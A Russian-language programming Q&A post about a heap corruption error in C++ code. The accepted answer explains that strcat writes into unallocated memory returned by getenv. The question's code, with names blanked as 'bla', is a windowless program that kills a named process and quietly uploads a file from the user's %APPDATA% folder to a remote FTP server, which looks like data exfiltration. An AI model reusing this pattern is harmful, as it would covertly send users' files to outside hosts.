# Heap block at 0040AF70 modified at 0040AFC4 past requested size of 4c

Tags: ftp, c++

```
#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <wininet.h>
#include <ctime>
#include <iostream>
#pragma comment(lib, "wininet")

void killprocess()
{    
        HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 );
        // Get the process list snapshot.
        PROCESSENTRY32 ProcessEntry = { 0 };
        // Initialize the process entry structure.
        ProcessEntry.dwSize = sizeof( ProcessEntry );
        // Get the first process info
        BOOL Return = FALSE;
        Return = Process32First( hProcessSnapShot,&ProcessEntry );
        int value = _tcsicmp(ProcessEntry.szExeFile, _T("bla.exe"));
        if (value==0)
        {
                HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID);
                //Open Process to terminate
                TerminateProcess(hProcess,0);
                CloseHandle(hProcess); //Close Handle }
        }
        while( Process32Next( hProcessSnapShot, &ProcessEntry ));
        CloseHandle( hProcessSnapShot );
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
        killprocess();
        Sleep(1);
        srand((unsigned)time(NULL));                    
        int seedone=rand();                                             
        int seedtwo=rand()*3;                                   // seed two times 3
        int seedboth = seedone + seedtwo;               // combine seeds to ensure 
        // now we need to convert int to char
        char randomseed[99];                                    
    itoa(seedboth,randomseed,10);

        char* appdata = getenv("APPDATA");              //Gets %Appdata% path
        char* truepath = strcat(appdata, "\\bla\\bla");  //file

        //ftp connection
        HINTERNET hInternet;
        HINTERNET hFtpSession;
        hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
        hFtpSession = InternetConnect(hInternet, "bla", INTERNET_DEFAULT_FTP_PORT, "bla", "bla", INTERNET_SERVICE_FTP, 0, 0);

        FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
        FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);

        InternetCloseHandle(hFtpSession);
        InternetCloseHandle(hInternet);
        return 0;
}
```

На сей код Visual Studio 2013 выдает:

```
The thread 0x1e48 has exited with code 0 (0x0).
The thread 0xe54 has exited with code 0 (0x0).
The thread 0x1d08 has exited with code 0 (0x0).
The thread 0xe18 has exited with code 0 (0x0).
The thread 0x9ac has exited with code 0 (0x0).
The thread 0x1fac has exited with code 0 (0x0).
The thread 0x2028 has exited with code 0 (0x0).
HEAP[Win32Project1.exe]: Heap block at 0040AF70 modified at 0040AFC4 past requested size of 4c
Win32Project1.exe has triggered a breakpoint.
```

и  выбрасывает меня на

```
extern "C" _CRTIMP int __cdecl _CrtIsValidHeapPointer(
        const void * pUserData
        )
{
        if (!pUserData)
            return FALSE;

        if (!_CrtIsValidPointer(pHdr(pUserData), sizeof(_CrtMemBlockHeader), FALSE))
            return FALSE;

        return HeapValidate( _crtheap, 0, pHdr(pUserData) );
}
```

вместо "bla" - реальные реализации файлов и ftp
Спасибо

Answer (score 4, accepted):

```
char* appdata = getenv("APPDATA");               //Gets %Appdata% path
char* truepath = strcat(appdata, "\\bla\\bla");  //file
```

Вы пишете в невыделенную память. `strcat` не довыделит память за вас.

Если вы пишете на C++, пользуйтесь `std::string`, там управление памятью автоматическое.